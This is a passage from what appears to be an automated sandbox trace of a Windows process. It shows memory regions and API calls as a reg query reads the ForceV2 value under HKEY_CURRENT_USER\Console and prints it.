"\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1147 start_va = 0x7ffbed0e0000 end_va = 0x7ffbed13afff monitored = 0 entry_point = 0x7ffbed0f38b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1148 start_va = 0x7ffbed620000 end_va = 0x7ffbed73bfff monitored = 0 entry_point = 0x7ffbed6602b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1149 start_va = 0x7ffbed7a0000 end_va = 0x7ffbed80afff monitored = 0 entry_point = 0x7ffbed7b90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1150 start_va = 0x18bc68e0000 end_va = 0x18bc6adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000018bc68e0000" filename = "" Region: id = 1151 start_va = 0x18bc65a0000 end_va = 0x18bc65a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000018bc65a0000" filename = "" Region: id = 1152 start_va = 0x18bc6ae0000 end_va = 0x18bc6e16fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1153 start_va = 0x18bc66c0000 end_va = 0x18bc66c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000018bc66c0000" filename = "" Thread: id = 50 os_tid = 0xce4 [0176.215] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff7b7500000 [0176.215] __set_app_type (_Type=0x1) [0176.215] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff7b750e510) returned 0x0 [0176.215] __wgetmainargs (in: _Argc=0x7ff7b7512048, _Argv=0x7ff7b7512050, _Env=0x7ff7b7512058, _DoWildCard=0, _StartInfo=0x7ff7b7512064 | out: _Argc=0x7ff7b7512048, _Argv=0x7ff7b7512050, _Env=0x7ff7b7512058) returned 0 [0176.216] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="query", cchCount1=-1, lpString2="QUERY", cchCount2=-1) returned 2 [0176.219] RegOpenKeyW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", phkResult=0x3cc5abfd48 | out: phkResult=0x3cc5abfd48*=0x0) returned 0x2 [0176.224] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="query", cchCount1=-1, lpString2="QUERY", cchCount2=-1) returned 2 [0176.224] lstrlenW (lpString="/?|-?|/h|-h") returned 11 [0176.224] GetProcessHeap () returned 0x18bc67e0000 [0176.224] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x18) returned 0x18bc67e4cf0 [0176.224] lstrlenW (lpString="") returned 0 [0176.224] GetProcessHeap () returned 0x18bc67e0000 [0176.224] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x2) returned 0x18bc67e4d10 [0176.224] GetProcessHeap () returned 0x18bc67e0000 [0176.224] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x20) returned 0x18bc67e48c0 [0176.224] GetProcessHeap () returned 0x18bc67e0000 [0176.224] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x18) returned 0x18bc67e4d30 [0176.225] GetProcessHeap () returned 0x18bc67e0000 [0176.225] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x20) returned 0x18bc67e48f0 [0176.225] GetProcessHeap () returned 0x18bc67e0000 [0176.225] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x20) returned 0x18bc67e8d20 [0176.225] GetProcessHeap () returned 0x18bc67e0000 [0176.225] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x20) returned 0x18bc67e89c0 [0176.225] GetProcessHeap () returned 0x18bc67e0000 [0176.225] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x20) returned 0x18bc67e8a20 [0176.225] GetProcessHeap () returned 0x18bc67e0000 [0176.225] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x18) returned 0x18bc67e4920 [0176.225] GetProcessHeap () returned 0x18bc67e0000 [0176.226] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x20) returned 0x18bc67e8cf0 [0176.226] GetProcessHeap () returned 0x18bc67e0000 [0176.226] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x20) returned 0x18bc67e8a80 [0176.226] GetProcessHeap () returned 0x18bc67e0000 [0176.226] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x20) returned 0x18bc67e89f0 [0176.226] GetProcessHeap () returned 0x18bc67e0000 [0176.226] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x20) returned 0x18bc67e8ba0 [0176.226] GetProcessHeap () returned 0x18bc67e0000 [0176.226] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x18) returned 0x18bc67e4940 [0176.226] GetProcessHeap () returned 0x18bc67e0000 [0176.226] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x20) returned 0x18bc67e8a50 [0176.226] GetProcessHeap () returned 0x18bc67e0000 [0176.226] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x20) returned 0x18bc67e8cc0 [0176.226] GetProcessHeap () returned 0x18bc67e0000 [0176.226] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x20) returned 0x18bc67e8b40 [0176.226] GetProcessHeap () returned 0x18bc67e0000 [0176.226] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x20) returned 0x18bc67e8b70 [0176.226] SetThreadUILanguage (LangId=0x0) returned 0x409 [0176.240] GetProcessHeap () returned 0x18bc67e0000 [0176.240] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x18) returned 0x18bc67e4960 [0176.240] _memicmp (_Buf1=0x18bc67e4960, _Buf2=0x7ff7b75100d8, _Size=0x7) returned 0 [0176.240] GetProcessHeap () returned 0x18bc67e0000 [0176.240] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x1e) returned 0x18bc67e8b10 [0176.240] lstrlenW (lpString="HKCU\\Console") returned 12 [0176.240] GetProcessHeap () returned 0x18bc67e0000 [0176.240] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x18) returned 0x18bc67e4bf0 [0176.240] _memicmp (_Buf1=0x18bc67e4bf0, _Buf2=0x7ff7b75100d8, _Size=0x7) returned 0 [0176.240] GetProcessHeap () returned 0x18bc67e0000 [0176.240] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x20) returned 0x18bc67e8bd0 [0176.241] _vsnwprintf (in: _Buffer=0x18bc67e8b10, _BufferCount=0xe, _Format="|%s|", _ArgList=0x3cc5abfbc8 | out: _Buffer="|/?|-?|/h|-h|") returned 13 [0176.241] _vsnwprintf (in: _Buffer=0x18bc67e8bd0, _BufferCount=0xf, _Format="|%s|", _ArgList=0x3cc5abfbc8 | out: _Buffer="|HKCU\\Console|") returned 14 [0176.241] lstrlenW (lpString="|/?|-?|/h|-h|") returned 13 [0176.241] lstrlenW (lpString="|HKCU\\Console|") returned 14 [0176.241] RtlRestoreLastWin32Error () returned 0x3cc5c56000 [0176.241] lstrlenW (lpString="HKCU\\Console") returned 12 [0176.241] GetProcessHeap () returned 0x18bc67e0000 [0176.241] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x1a) returned 0x18bc67e8c00 [0176.241] lstrlenW (lpString="HKCU\\Console") returned 12 [0176.241] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0176.241] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0176.241] StrChrW (lpStart=" \x09", wMatch=0x4b) returned 0x0 [0176.241] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0176.241] StrChrW (lpStart=" \x09", wMatch=0x55) returned 0x0 [0176.241] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0176.241] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0176.241] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0176.241] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0176.241] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0176.241] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0176.241] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0176.241] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0176.241] lstrlenW (lpString="HKCU\\Console") returned 12 [0176.242] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKCU\\Console", cchCount1=2, lpString2="\\\\", cchCount2=2) returned 3 [0176.242] lstrlenW (lpString="HKCU\\Console") returned 12 [0176.242] lstrlenW (lpString="HKCU\\Console") returned 12 [0176.242] StrChrIW (lpStart="HKCU\\Console", wMatch=0x5c) returned="\\Console" [0176.243] lstrlenW (lpString="HKEY_CURRENT_CONFIG") returned 19 [0176.243] GetProcessHeap () returned 0x18bc67e0000 [0176.243] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x28) returned 0x18bc67e8c30 [0176.243] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKCU", cchCount1=-1, lpString2="HKCU", cchCount2=-1) returned 2 [0176.243] lstrlenW (lpString="Console") returned 7 [0176.243] lstrlenW (lpString="Console") returned 7 [0176.243] lstrlenW (lpString="Console") returned 7 [0176.243] StrChrIW (lpStart="Console", wMatch=0x5c) returned 0x0 [0176.243] RtlRestoreLastWin32Error () returned 0x3cc5c56000 [0176.243] lstrlenW (lpString="Console") returned 7 [0176.243] RtlRestoreLastWin32Error () returned 0x3cc5c56000 [0176.243] lstrlenW (lpString="Console") returned 7 [0176.243] GetProcessHeap () returned 0x18bc67e0000 [0176.243] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x10) returned 0x18bc67e4c10 [0176.244] GetProcessHeap () returned 0x18bc67e0000 [0176.244] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x3c) returned 0x18bc67e4840 [0176.244] GetProcessHeap () returned 0x18bc67e0000 [0176.244] GetProcessHeap () returned 0x18bc67e0000 [0176.244] HeapValidate (hHeap=0x18bc67e0000, dwFlags=0x0, lpMem=0x18bc67e8c30) returned 1 [0176.244] GetProcessHeap () returned 0x18bc67e0000 [0176.244] RtlSizeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, MemoryPointer=0x18bc67e8c30) returned 0x28 [0176.244] RtlFreeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, BaseAddress=0x18bc67e8c30) returned 1 [0176.244] GetProcessHeap () returned 0x18bc67e0000 [0176.244] GetProcessHeap () returned 0x18bc67e0000 [0176.244] HeapValidate (hHeap=0x18bc67e0000, dwFlags=0x0, lpMem=0x18bc67e8c00) returned 1 [0176.244] GetProcessHeap () returned 0x18bc67e0000 [0176.244] RtlSizeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, MemoryPointer=0x18bc67e8c00) returned 0x1a [0176.244] RtlFreeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, BaseAddress=0x18bc67e8c00) returned 1 [0176.244] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/v", cchCount1=-1, lpString2="/f", cchCount2=-1) returned 3 [0176.244] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/v", cchCount1=-1, lpString2="-f", cchCount2=-1) returned 1 [0176.244] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/v", cchCount1=-1, lpString2="/k", cchCount2=-1) returned 3 [0176.244] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/v", cchCount1=-1, lpString2="-k", cchCount2=-1) returned 1 [0176.244] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/v", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 2 [0176.244] lstrlenW (lpString="ForceV2") returned 7 [0176.244] GetProcessHeap () returned 0x18bc67e0000 [0176.245] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x10) returned 0x18bc67e3f80 [0176.245] lstrlenW (lpString="ForceV2") returned 7 [0176.245] lstrlenW (lpString="ForceV2") returned 7 [0176.245] GetProcessHeap () returned 0x18bc67e0000 [0176.245] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x20) returned 0x18bc67e8c00 [0176.245] GetProcessHeap () returned 0x18bc67e0000 [0176.245] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x20) returned 0x18bc67e8c30 [0176.245] GetProcessHeap () returned 0x18bc67e0000 [0176.245] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x20) returned 0x18bc67e8c60 [0176.245] GetProcessHeap () returned 0x18bc67e0000 [0176.245] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x20) returned 0x18bc67e8c90 [0176.245] GetProcessHeap () returned 0x18bc67e0000 [0176.245] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x18) returned 0x18bc67e3fa0 [0176.245] _memicmp (_Buf1=0x18bc67e3fa0, _Buf2=0x7ff7b75100d8, _Size=0x7) returned 0 [0176.245] GetProcessHeap () returned 0x18bc67e0000 [0176.245] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x22) returned 0x18bc67e9d60 [0176.245] GetProcessHeap () returned 0x18bc67e0000 [0176.245] HeapValidate (hHeap=0x18bc67e0000, dwFlags=0x0, lpMem=0x18bc67e3f80) returned 1 [0176.245] GetProcessHeap () returned 0x18bc67e0000 [0176.245] RtlSizeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, MemoryPointer=0x18bc67e3f80) returned 0x10 [0176.245] RtlRestoreLastWin32Error () returned 0x3cc5c56000 [0176.245] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Console", ulOptions=0x0, samDesired=0x20019, phkResult=0x3cc5abfc90 | out: phkResult=0x3cc5abfc90*=0x7c) returned 0x0 [0176.245] __iob_func () returned 0x7ffbed90e210 [0176.245] _fileno (_File=0x7ffbed90e240) returned 1 [0176.246] _errno () returned 0x18bc6ad0840 [0176.246] _get_osfhandle (_FileHandle=1) returned 0x24 [0176.246] _errno () returned 0x18bc6ad0840 [0176.246] GetFileType (hFile=0x24) returned 0x3 [0176.246] lstrlenW (lpString="\n") returned 1 [0176.246] GetConsoleOutputCP () returned 0x1b5 [0176.247] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0176.247] GetConsoleOutputCP () returned 0x1b5 [0176.248] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x7ff7b7512600, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0176.248] fprintf (in: _File=0x7ffbed90e240, _Format="%s" | out: _File=0x7ffbed90e240) returned 1 [0176.249] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0176.249] lstrlenW (lpString="ForceV2") returned 7 [0176.249] lstrlenW (lpString="*?") returned 2 [0176.249] lstrlenW (lpString="ForceV2") returned 7 [0176.249] lstrlenW (lpString="ForceV2") returned 7 [0176.249] lstrlenW (lpString="ForceV2") returned 7 [0176.249] StrChrIW (lpStart="ForceV2", wMatch=0x2a) returned 0x0 [0176.249] RtlRestoreLastWin32Error () returned 0x3cc5c56000 [0176.249] lstrlenW (lpString="ForceV2") returned 7 [0176.249] StrChrIW (lpStart="ForceV2", wMatch=0x3f) returned 0x0 [0176.249] RtlRestoreLastWin32Error () returned 0x3cc5c56000 [0176.249] RtlRestoreLastWin32Error () returned 0x3cc5c56000 [0176.249] RegGetValueW (in: hkey=0x7c, lpSubKey=0x0, lpValue="ForceV2", dwFlags=0xffff, pdwType=0x0, pvData=0x0, pcbData=0x3cc5abfc60*=0x0 | out: pdwType=0x0, pvData=0x0, pcbData=0x3cc5abfc60*=0x4) returned 0x0 [0176.249] GetProcessHeap () returned 0x18bc67e0000 [0176.249] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x6) returned 0x18bc67e3fc0 [0176.249] GetProcessHeap () returned 0x18bc67e0000 [0176.249] HeapValidate (hHeap=0x18bc67e0000, dwFlags=0x0, lpMem=0x18bc67e3fc0) returned 1 [0176.249] GetProcessHeap () returned 0x18bc67e0000 [0176.249] RtlSizeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, MemoryPointer=0x18bc67e3fc0) returned 0x6 [0176.249] RegGetValueW (in: hkey=0x7c, lpSubKey=0x0, lpValue="ForceV2", dwFlags=0x1000ffff, pdwType=0x3cc5abfbe0, pvData=0x18bc67e3fc0, pcbData=0x3cc5abfc60*=0x4 | out: pdwType=0x3cc5abfbe0*=0x4, pvData=0x18bc67e3fc0*=0x1, pcbData=0x3cc5abfc60*=0x4) returned 0x0 [0176.249] __iob_func () returned 0x7ffbed90e210 [0176.250] GetProcessHeap () returned 0x18bc67e0000 [0176.250] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x18) returned 0x18bc67e3fe0 [0176.250] _memicmp (_Buf1=0x18bc67e3fe0, _Buf2=0x7ff7b75100d8, _Size=0x7) returned 0 [0176.250] GetProcessHeap () returned 0x18bc67e0000 [0176.250] RtlAllocateHeap (HeapHandle=0x18bc67e0000, Flags=0xc, Size=0x1000) returned 0x18bc67ea010 [0176.250] _vsnwprintf (in: _Buffer=0x18bc67ea010, _BufferCount=0x7ff, _Format="%s\n", _ArgList=0x3cc5abfbc0 | out: _Buffer="HKEY_CURRENT_USER\\Console\n") returned 26 [0176.250] _fileno (_File=0x7ffbed90e240) returned 1 [0176.250] _errno () returned 0x18bc6ad0840 [0176.250] _get_osfhandle (_FileHandle=1) returned 0x24 [0176.250] _errno () returned 0x18bc6ad0840 [0176.250] GetFileType (hFile=0x24) returned 0x3 [0176.250] lstrlenW (lpString="HKEY_CURRENT_USER\\Console\n") returned 26 [0176.250] GetConsoleOutputCP () returned 0x1b5 [0176.252] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="HKEY_CURRENT_USER\\Console\n", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0176.252] GetConsoleOutputCP () returned 0x1b5 [0176.252] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="HKEY_CURRENT_USER\\Console\n", cchWideChar=26, lpMultiByteStr=0x7ff7b7512600, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKEY_CURRENT_USER\\Console\n", lpUsedDefaultChar=0x0) returned 26 [0176.252] fprintf (in: _File=0x7ffbed90e240, _Format="%s" | out: _File=0x7ffbed90e240) returned 26 [0176.252] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0176.253] __iob_func () returned 0x7ffbed90e210 [0176.253] _memicmp (_Buf1=0x18bc67e3fe0, _Buf2=0x7ff7b75100d8, _Size=0x7) returned 0 [0176.253] _vsnwprintf (in: _Buffer=0x18bc67ea010, _BufferCount=0x7ff, _Format="%*s", _ArgList=0x3cc5abfb70 | out: _Buffer=" ") returned 4 [0176.253] _fileno (_File=0x7ffbed90e240) returned 1 [0176.253] _errno () returned 0x18bc6ad0840 [0176.253] _get_osfhandle (_FileHandle=1) returned 0x24 [0176.253] _errno () returned 0x18bc6ad0840 [0176.253] GetFileType (hFile=0x24) returned 0x3 [0176.253] lstrlenW (lpString=" ") returned 4 [0176.253] GetConsoleOutputCP () returned 0x1b5 [0176.260] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0176.260] GetConsoleOutputCP () returned 0x1b5 [0176.262] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=4, lpMultiByteStr=0x7ff7b7512600, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 4 [0176.262] fprintf (in: _File=0x7ffbed90e240, _Format="%s" | out: _File=0x7ffbed90e240) returned 4 [0176.262] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0176.262] lstrlenW (lpString="ForceV2") returned 7 [0176.262] __iob_func () returned 0x7ffbed90e210 [0176.262] _fileno (_File=0x7ffbed90e240) returned 1 [0176.262] _errno () returned 0x18bc6ad0840 [0176.262] _get_osfhandle (_FileHandle=1) returned 0x24 [0176.262] _errno () returned 0x18bc6ad0840 [0176.262] GetFileType (hFile=0x24) returned 0x3 [0176.262] lstrlenW (lpString="ForceV2") returned 7 [0176.262] GetConsoleOutputCP () returned 0x1b5 [0176.266] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="ForceV2", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0176.266] GetConsoleOutputCP () returned 0x1b5 [0176.266] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="ForceV2", cchWideChar=7, lpMultiByteStr=0x7ff7b7512600, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ForceV2", lpUsedDefaultChar=0x0) returned 7 [0176.267] fprintf (in: _File=0x7ffbed90e240, _Format="%s" | out: _File=0x7ffbed90e240) returned 7 [0176.267] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0176.267] __iob_func () returned 0x7ffbed90e210 [0176.267] _fileno (_File=0x7ffbed90e240) returned 1 [0176.267] _errno () returned 0x18bc6ad0840 [0176.267] _get_osfhandle (_FileHandle=1) returned 0x24 [0176.267] _errno () returned 0x18bc6ad0840 [0176.267] GetFileType (hFile=0x24) returned 0x3 [0176.267] lstrlenW (lpString=" ") returned 4 [0176.267] GetConsoleOutputCP () returned 0x1b5 [0176.267] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0176.267] GetConsoleOutputCP () returned 0x1b5 [0176.268] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=4, lpMultiByteStr=0x7ff7b7512600, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 4 [0176.268] fprintf (in: _File=0x7ffbed90e240, _Format="%s" | out: _File=0x7ffbed90e240) returned 4 [0176.268] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0176.268] __iob_func () returned 0x7ffbed90e210 [0176.268] _fileno (_File=0x7ffbed90e240) returned 1 [0176.268] _errno () returned 0x18bc6ad0840 [0176.268] _get_osfhandle (_FileHandle=1) returned 0x24 [0176.268] _errno () returned 0x18bc6ad0840 [0176.268] GetFileType (hFile=0x24) returned 0x3 [0176.268] lstrlenW (lpString="REG_DWORD") returned 9 [0176.268] GetConsoleOutputCP () returned 0x1b5 [0176.269] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="REG_DWORD", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0176.269] GetConsoleOutputCP () returned 0x1b5 [0176.269] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="REG_DWORD", cchWideChar=9, lpMultiByteStr=0x7ff7b7512600, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="REG_DWORD", lpUsedDefaultChar=0x0) returned 9 [0176.269] fprintf (in: _File=0x7ffbed90e240, _Format="%s" | out: _File=0x7ffbed90e240) returned 9 [0176.269] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0176.270] __iob_func () returned 0x7ffbed90e210 [0176.270] _fileno (_File=0x7ffbed90e240) returned 1 [0176.270] _errno () returned 0x18bc6ad0840 [0176.270] _get_osfhandle (_FileHandle=1) returned 0x24 [0176.270] _errno () returned 0x18bc6ad0840 [0176.270] GetFileType (hFile=0x24) returned 0x3 [0176.270] lstrlenW (lpString=" ") returned 4 [0176.270] GetConsoleOutputCP () returned 0x1b5 [0176.270] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0176.270] GetConsoleOutputCP () returned 0x1b5 [0176.271] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=4, lpMultiByteStr=0x7ff7b7512600, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 4 [0176.271] fprintf (in: _File=0x7ffbed90e240, _Format="%s" | out: _File=0x7ffbed90e240) returned 4 [0176.271] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0176.271] __iob_func () returned 0x7ffbed90e210 [0176.271] _memicmp (_Buf1=0x18bc67e3fe0, _Buf2=0x7ff7b75100d8, _Size=0x7) returned 0 [0176.271] _vsnwprintf (in: _Buffer=0x18bc67ea010, _BufferCount=0x7ff, _Format="0x%x", _ArgList=0x3cc5abfb70 | out: _Buffer="0x1") returned 3 [0176.271] _fileno (_File=0x7ffbed90e240) returned 1 [0176.271] _errno () returned 0x18bc6ad0840 [0176.271] _get_osfhandle (_FileHandle=1) returned 0x24 [0176.271] _errno () returned 0x18bc6ad0840 [0176.271] GetFileType (hFile=0x24) returned 0x3 [0176.271] lstrlenW (lpString="0x1") returned 3 [0176.271] GetConsoleOutputCP () returned 0x1b5 [0176.272] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="0x1", cchWideChar=3, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0176.272] GetConsoleOutputCP () returned 0x1b5 [0176.272] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="0x1", cchWideChar=3, lpMultiByteStr=0x7ff7b7512600, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0x1", lpUsedDefaultChar=0x0) returned 3 [0176.272] fprintf (in: _File=0x7ffbed90e240, _Format="%s" | out: _File=0x7ffbed90e240) returned 3 [0176.272] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0176.273] __iob_func () returned 0x7ffbed90e210 [0176.273] _fileno (_File=0x7ffbed90e240) returned 1 [0176.273] _errno () returned 0x18bc6ad0840 [0176.273] _get_osfhandle (_FileHandle=1) returned 0x24 [0176.273] _errno () returned 0x18bc6ad0840 [0176.273] GetFileType (hFile=0x24) returned 0x3 [0176.273] lstrlenW (lpString="\n") returned 1 [0176.273] GetConsoleOutputCP () returned 0x1b5 [0176.273] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0176.273] GetConsoleOutputCP () returned 0x1b5 [0176.274] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x7ff7b7512600, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 